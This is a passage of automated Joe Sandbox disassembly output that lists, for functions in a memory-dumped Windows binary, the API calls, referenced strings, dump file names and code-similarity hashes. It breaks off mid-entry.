SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0044A2AA
SafeArrayAllocData.OLEAUT32(?), ref: 0044A2F5
VariantInit.OLEAUT32(?), ref: 0044A307
SafeArrayAccessData.OLEAUT32(?,?), ref: 0044A327
VariantCopy.OLEAUT32(?,?), ref: 0044A36A
SafeArrayUnaccessData.OLEAUT32(?), ref: 0044A37E
VariantClear.OLEAUT32(?), ref: 0044A393
SafeArrayDestroyData.OLEAUT32(?), ref: 0044A3A0
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0044A3A9
VariantClear.OLEAUT32(?), ref: 0044A3BB
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0044A3C6

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 5219ab68f82c49e3c75369fb69c552406e89ba20f34e5beb469e05cdda123642
Instruction ID: 78c8abd8849bc55f993317749de71dd84904db7ea28518ae955211684bb28bbf
Opcode Fuzzy Hash: 5219ab68f82c49e3c75369fb69c552406e89ba20f34e5beb469e05cdda123642
Instruction Fuzzy Hash: 12415B31D40219AFDB00DFA4DC849DEBBB9FF58344F00807AE901A3261DB74AA55CBA9

Function 0046B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

CoInitialize.OLE32 ref: 0046B298
CoUninitialize.COMBASE ref: 0046B2A3
CoCreateInstance.COMBASE(?,00000000,00000017,0049D8FC,?), ref: 0046B303
IIDFromString.COMBASE(?,?), ref: 0046B376
VariantInit.OLEAUT32(?), ref: 0046B410
VariantClear.OLEAUT32(?), ref: 0046B471

Strings

NULL Pointer assignment, xrefs: 0046B348
Invalid parameter, xrefs: 0046B38F
Failed to create object, xrefs: 0046B30E, 0046B3C4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 45976f38f942aaa898f07b3d0f916afc60a58fa55e9f96a6f87dbc3ce4388f85
Instruction ID: 70d4c26b69958746f3b6c4657e0a1ff83493e423a5c2cb62efc53ae1909ad053
Opcode Fuzzy Hash: 45976f38f942aaa898f07b3d0f916afc60a58fa55e9f96a6f87dbc3ce4388f85
Instruction Fuzzy Hash: 55618931604201AFC710DF55C884B6AB7E8EF88714F10441EF985DB292EB78ED85CB9B

Function 00468694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 004686F5
inet_addr.WS2_32(?), ref: 0046873A
gethostbyname.WS2_32(?), ref: 00468746
IcmpCreateFile.IPHLPAPI ref: 00468754
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004687C4
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004687DA
IcmpCloseHandle.IPHLPAPI(00000000), ref: 0046884F
WSACleanup.WS2_32 ref: 00468855

Strings

Ping, xrefs: 00468778

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 10cd0bf3ec9cb9e00e51844a39357d0215e6c4b0ed0ba29c599fcbbb0bfdc006
Instruction ID: f192ea48848610dcc6b811603219a79f0c410b94b3e81d8b2f417828b1a9b70c
Opcode Fuzzy Hash: 10cd0bf3ec9cb9e00e51844a39357d0215e6c4b0ed0ba29c599fcbbb0bfdc006
Instruction Fuzzy Hash: 1A51A3316043019FD710EF21CD45B6AB7E4EF48724F148A6FF595972A1EB38E841CB4A

Function 00479C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00479C68
CreateMenu.USER32 ref: 00479C83
SetMenu.USER32(?,00000000), ref: 00479C92
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00479D1F
IsMenu.USER32(?), ref: 00479D35
CreatePopupMenu.USER32 ref: 00479D3F
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00479D70
DrawMenuBar.USER32 ref: 00479D7E

Strings

0, xrefs: 00479C61

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: b0779cfce076b0d63e9871e21c073035d58091d5d2f77823d95cb49f72785b59
Instruction ID: 6f29d9074538a27c2f7d12bc55255c897f7c33b223a3637ba10b51064e5c0bbc
Opcode Fuzzy Hash: b0779cfce076b0d63e9871e21c073035d58091d5d2f77823d95cb49f72785b59
Instruction Fuzzy Hash: 3A413575A00209EFDB20EF64D884BDA7BB5FF49314F14402AE94997361D738AD10DB68

Function 0045EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045EC1E
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0045EC94
GetLastError.KERNEL32 ref: 0045EC9E
SetErrorMode.KERNEL32(00000000,READY), ref: 0045ED0B

Strings

READONLY, xrefs: 0045ECD6
INVALID, xrefs: 0045ECDD
UNKNOWN, xrefs: 0045ECC3
NOTREADY, xrefs: 0045ECCA
READY, xrefs: 0045ECE4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 7c9c732e90af224eed142ad373caee36445b8ad4eb817c498e50343648867dec
Instruction ID: d10c11596ff8b578590cd9a31b43f8600073c59c417298465a10c95d016c7bb5
Opcode Fuzzy Hash: 7c9c732e90af224eed142ad373caee36445b8ad4eb817c498e50343648867dec
Instruction Fuzzy Hash: 1B31E335A002059FC706EF66C945EEEB7B4EF44702F10802BE906D7392DA78DA45DB89

Function 0044C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0044C782
GetDlgCtrlID.USER32 ref: 0044C78D
GetParent.USER32 ref: 0044C7A9
SendMessageW.USER32(00000000,?,00000111,?), ref: 0044C7AC
GetDlgCtrlID.USER32(?), ref: 0044C7B5
GetParent.USER32(?), ref: 0044C7D1
SendMessageW.USER32(00000000,?,?,00000111), ref: 0044C7D4

Strings

ComboBox, xrefs: 0044C707
ListBox, xrefs: 0044C73F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$CtrlParent$_memmove
String ID: ComboBox$ListBox
API String ID: 313823418-1403004172
Opcode ID: 899a45cf42ec8b5dc7d22712eac780e621d5768a12596155ededb776831324eb
Instruction ID: d333530c12896956bef002351f1e97088618a134f817d41a17fa31a5808918ae
Opcode Fuzzy Hash: 899a45cf42ec8b5dc7d22712eac780e621d5768a12596155ededb776831324eb
Instruction Fuzzy Hash: 6821AE74A00208AFDF05EB61CC85EFEB765AB55300F54012BF522932E1DBB95856EA68

Function 0044C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0044C869
GetDlgCtrlID.USER32 ref: 0044C874
GetParent.USER32 ref: 0044C890
SendMessageW.USER32(00000000,?,00000111,?), ref: 0044C893
GetDlgCtrlID.USER32(?), ref: 0044C89C
GetParent.USER32(?), ref: 0044C8B8
SendMessageW.USER32(00000000,?,?,00000111), ref: 0044C8BB

Strings

ComboBox, xrefs: 0044C7F0
ListBox, xrefs: 0044C828

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$CtrlParent$_memmove
String ID: ComboBox$ListBox
API String ID: 313823418-1403004172
Opcode ID: 74e608be0988bbc9980293e553544b87cedc092fb0b7750dd3f32068f23702a9
Instruction ID: efe702cfd174b539c2d05ce72b52740fd56d1916e2fc055963eafa752ee0a2c2
Opcode Fuzzy Hash: 74e608be0988bbc9980293e553544b87cedc092fb0b7750dd3f32068f23702a9
Instruction Fuzzy Hash: F621C175A00208AFDF01EB61CC85EFEB774EF55301F540027F511A3291DBB95859EB28

Function 0044C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0044C8D9
GetClassNameW.USER32(00000000,?,00000100), ref: 0044C8EE
_wcscmp.LIBCMT ref: 0044C900
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0044C97B

Strings

details, xrefs: 0044C929
largeicons, xrefs: 0044C90F
smallicons, xrefs: 0044C943
list, xrefs: 0044C95D
SHELLDLL_DefView, xrefs: 0044C8FA

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 2043b84fce14a4f9e648d41051b4b9b5289919eb98508113ed0c6fad03f807c0
Instruction ID: 27171ea30bf6b94b02536fde626f2b82480fffbde702fb99a430d06372d45796
Opcode Fuzzy Hash: 2043b84fce14a4f9e648d41051b4b9b5289919eb98508113ed0c6fad03f807c0
Instruction Fuzzy Hash: 9B11CAFA649702BAF6842A319D46EA7B79CDB16764B20002BF910A50D2FBED7D02455C

Function 0045B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0045B137

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 4cf5e4f2a05ebf11abfe4d00a8021abfe525b92f7950c00761ab4ba52a29158a
Instruction ID: 664303c531a909e6b4ca5a924920824252d22f9d2e463be65cd555d7a835c62d
Opcode Fuzzy Hash: 4cf5e4f2a05ebf11abfe4d00a8021abfe525b92f7950c00761ab4ba52a29158a
Instruction Fuzzy Hash: 04C17F75A0021ADFDB00CF98D485BAEB7B4FF08316F24406BE915E7242C738A949CBD9

Function 0043BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0043BA74

Part of subcall function 00438984: __mtinitlocknum.LIBCMT ref: 00438996
Part of subcall function 00438984: RtlEnterCriticalSection.NTDLL(00430127), ref: 004389AF

__calloc_crt.LIBCMT ref: 0043BA85

Part of subcall function 00437616: __calloc_impl.LIBCMT ref: 00437625
Part of subcall function 00437616: Sleep.KERNEL32(00000000,?,00430127,?,0041125D,00000058,?,?), ref: 0043763C

@_EH4_CallFilterFunc@8.LIBCMT ref: 0043BAA0
GetStartupInfoW.KERNEL32(?,004C6990,00000064,00436B14,004C67D8,00000014), ref: 0043BAF9
__calloc_crt.LIBCMT ref: 0043BB44
GetFileType.KERNEL32(00000001), ref: 0043BB8B
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0043BBC4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 1860ae90d3ae08f70d63d82d934cc600fcb28c6ad49e72f009c0de51edb82d6c
Instruction ID: 42b61ad0bf1633616dd40a6734e6e09e99e7d3623e7441e8467add1fc7027de8
Opcode Fuzzy Hash: 1860ae90d3ae08f70d63d82d934cc600fcb28c6ad49e72f009c0de51edb82d6c
Instruction Fuzzy Hash: F88193709057458EDB24CF68C84076DBBB0EF59324F24626FD5A6A73D1CB389903CB99

Function 00454A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00454A7D
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00453AD7,?,00000001), ref: 00454A91
GetWindowThreadProcessId.USER32(00000000), ref: 00454A98
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00453AD7,?,00000001), ref: 00454AA7
GetWindowThreadProcessId.USER32(?,00000000), ref: 00454AB9
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00453AD7,?,00000001), ref: 00454AD2
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00453AD7,?,00000001), ref: 00454AE4
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00453AD7,?,00000001), ref: 00454B29
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00453AD7,?,00000001), ref: 00454B3E
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00453AD7,?,00000001), ref: 00454B49

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: b79c1171b8395b5e25181bba847098d20835e05e13f7dac0aa8c17587bff287a
Instruction ID: 272d91125f7f54fd00d022ebe0ce541c2866b36d99d9aac5ef0f26b5d282de9e
Opcode Fuzzy Hash: b79c1171b8395b5e25181bba847098d20835e05e13f7dac0aa8c17587bff287a
Instruction Fuzzy Hash: 9F31BF71601200ABDB109F54EC88B6A77BAABD0357F104027FE04CB291D3B9EE848B6D

Function 0044D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0044DD46), ref: 0044DC86

Strings

CLASSNN, xrefs: 0044DA29
REGEXPCLASS, xrefs: 0044DA4C
CLASS, xrefs: 0044DA06
TEXT, xrefs: 0044DBBD
NAME, xrefs: 0044DAB8
INSTANCE, xrefs: 0044DB94

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 970c6c512b99de5b978eaffbc9fb28f10efee54f637405d480b3b71c3429bfa8
Instruction ID: fb67aa849c236caad4179a3808a2fbfe6b951aed19d6dd42795168223dd79132
Opcode Fuzzy Hash: 970c6c512b99de5b978eaffbc9fb28f10efee54f637405d480b3b71c3429bfa8
Instruction Fuzzy Hash: AA91B530E005069ADB08DF61C9C1BEAF7B5FF04344F54812FD85AA7251DB78B94ADB98

Function 004145A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004145F0
CoUninitialize.COMBASE ref: 00414695
UnregisterHotKey.USER32(?), ref: 004147BD
DestroyWindow.USER32(?), ref: 00485936
FreeLibrary.KERNEL32(?), ref: 0048599D
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004859CA

Strings

close all, xrefs: 004145EB

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: f23e362238c9da0b0044aa6a2c10c4cf84c85e4c3cced02ea92ecbaec1dcee2e
Instruction ID: 6378fa02655025da7f16e0e2c2ab4ac476d2cdf22530dd397f556209d6f93b7c
Opcode Fuzzy Hash: f23e362238c9da0b0044aa6a2c10c4cf84c85e4c3cced02ea92ecbaec1dcee2e
Instruction Fuzzy Hash: 35915074700602CFC715EF15C995BA9F3A4FF55708F5042AEE40A97262DB38AEA6CF48

Function 0042C24A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0042C2D2

Part of subcall function 0042C697: GetClientRect.USER32(?,?), ref: 0042C6C0
Part of subcall function 0042C697: GetWindowRect.USER32(?,?), ref: 0042C701
Part of subcall function 0042C697: ScreenToClient.USER32(?,000000FF), ref: 0042C729

GetDC.USER32 ref: 0048E006
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0048E019
SelectObject.GDI32(00000000,00000000), ref: 0048E027
SelectObject.GDI32(00000000,00000000), ref: 0048E03C
ReleaseDC.USER32(?,00000000), ref: 0048E044
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0048E0CF

Strings

U, xrefs: 0048DFA4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 64080b6eafffe1059a98a00f4ea81091261a743c749283e89d179ad8e9d8000b
Instruction ID: 3b30ad3f5043d6a44202a22dc9a618864d1edeed0e30bc53bb771908ad3e33d9
Opcode Fuzzy Hash: 64080b6eafffe1059a98a00f4ea81091261a743c749283e89d179ad8e9d8000b
